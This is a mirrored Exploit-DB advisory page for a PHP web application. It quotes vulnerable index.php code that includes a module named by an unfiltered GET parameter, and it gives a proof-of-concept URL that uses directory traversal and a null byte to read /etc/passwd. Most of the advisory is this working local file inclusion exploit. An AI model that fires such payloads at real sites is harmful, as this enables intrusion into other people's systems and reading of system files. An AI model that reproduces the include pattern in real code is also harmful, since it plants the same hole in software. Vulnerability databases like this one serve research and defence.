exploit-db-mirror/exploits/php/webapps/14208.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

15 lines
No EOL
425 B
Text

: # Tested on: Linux os :
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
----------------------------------------------------------------------------
[+] file:index.php on line 75
[+] Code:
<?
else {
$module = $_GET['a'];
}
require 'modules/' . $module . '.php';
?>
[+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00